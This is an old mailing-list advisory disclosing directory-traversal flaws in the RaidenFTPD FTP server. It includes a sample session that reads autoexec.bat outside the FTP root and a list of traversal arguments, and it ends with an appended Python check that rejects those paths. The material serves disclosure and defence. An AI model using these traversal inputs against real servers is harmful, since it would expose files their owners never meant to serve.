

Vulnerabilities in RaidenFTPD Server


Date: Wed, 25 Apr 2001 17:13:06 -0800
From: [email protected]
To: [email protected]
Subject: Vulnerabilities in RaidenFTPD Server


----- Begin Hush Signed Message from [email protected] -----

Vulnerabilities in RaidenFTPD Server



    Overview

RaidenFTPD v2.1 is an ftp server available from
http://playstation2.idv.tw/raidenftpd.  Vulnerabilities exist which allow
users to break out of the ftp root.



    Details

The following is an illustration of the problem:

> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog .
Password:
  [really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226-Ñ+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+
226-¦¦½ßñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+
226-Ñ+½e¬¦Ñ++²¼O /
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250-ª¦Ñ++²¦-ñU¬+¦í 1323 mb
250 "/.." is current directory.


This excerpt was taken from a session involving build #947.  The vendor
released four builds since I initially contacted them to address additional
variations.  The following is a list of vulnerabilities which affected
these intermediate versions:

CWD \....
CWD *\.....
CWD /..../
NLST ..
NLST ...
NLST \..\
NLST \...\




    Solution

Upgrade to build #952 at:
http://playstation2.idv.tw/raidenftpd/download.html



    Vendor Status

Team JohnLong was contacted via <[email protected]> on
Friday, April 20, 2001.  They quickly responded and worked diligently
on the problems until all issues were fixed.



    - Joe Testa

e-mail:   [email protected]
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron




This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
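
Added example (not part of the original advisory and not RaidenFTPD's code): a sketch of a path check that refuses the get/CWD/NLST arguments listed in the advisory, by resolving client paths against a virtual root, treating \ and / alike, and rejecting dot-run segments. The names resolve_virtual, PathEscape, ADVISORY_ARGS and check_all are hypothetical.

```python
import re

SEPARATORS = re.compile(r"[\\/]+")   # treat '\' and '/' as the same separator
DOTS_ONLY = re.compile(r"^[. ]+$")   # segment made only of dots and spaces


class PathEscape(ValueError):
    """Raised when a client path would leave the virtual FTP root."""


def resolve_virtual(cwd, arg):
    """Resolve a client-supplied FTP path to a normalized virtual path.

    cwd is the session's current virtual directory ('/' is the FTP root).
    Returns an absolute virtual path such as '/pub/file.txt'; the caller
    joins that onto the real root directory only after this check passes.
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    absolute = arg[:1] in ("/", "\\")
    stack = [] if absolute else [s for s in cwd.split("/") if s]
    for seg in SEPARATORS.split(arg):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise PathEscape("'..' above root: %r" % arg)
            stack.pop()
        elif DOTS_ONLY.match(seg):
            # '...', '....' and so on are never legitimate names; the
            # advisory shows the server following them out of the root.
            raise PathEscape("dot-run segment: %r" % arg)
        else:
            stack.append(seg)
    return "/" + "/".join(stack)


# Arguments taken from the advisory text, all evaluated from the FTP root.
ADVISORY_ARGS = ["....\\....\\autoexec.bat", "....", "\\....", "*\\.....",
                 "/..../", "..", "...", "\\..\\", "\\...\\"]


def check_all(cwd="/"):
    """Return {arg: resolved virtual path or 'REJECTED'} per advisory string."""
    out = {}
    for a in ADVISORY_ARGS:
        try:
            out[a] = resolve_virtual(cwd, a)
        except PathEscape:
            out[a] = "REJECTED"
    return out
```
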




